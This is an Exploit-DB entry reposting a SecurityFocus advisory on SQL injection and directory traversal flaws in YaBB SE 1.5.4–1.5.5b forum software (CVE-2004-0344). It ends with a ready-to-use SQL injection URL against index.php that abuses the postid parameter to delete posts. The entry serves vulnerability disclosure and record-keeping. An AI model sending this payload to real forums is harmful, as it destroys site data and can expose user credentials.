YaBB SE 1.5.x - Arbitrary File Deletion

2004-03-01T00:00:00
ID EDB-ID:23774
Type exploitdb
Reporter Alnitak and BackSpace
Modified 2004-03-01T00:00:00

Description

YaBB SE 1.5.x Arbitrary File Deletion. CVE-2004-0344. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/9774/info

It has been reported that YaBB SE may be prone to multiple vulnerabilities due to improper input validation. The issues may allow an attacker to carry out SQL injection and directory traversal attacks. Successful exploitation of these issues may allow an attacker to gain access to sensitive information that may be used to mount further attacks against a vulnerable system. The SQL injection vulnerabilities can be exploited to gain access to user authentication credentials and corrupt user information in the underlying database.

YaBB SE versions 1.5.4, 1.5.5, and 1.5.5b are reported to be affected by these issues, however it is possible that other versions are vulnerable as well.

http://www.example.com/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;posti
d=1+or+1=1+ORDER+BY+ID_MSG+DESC/*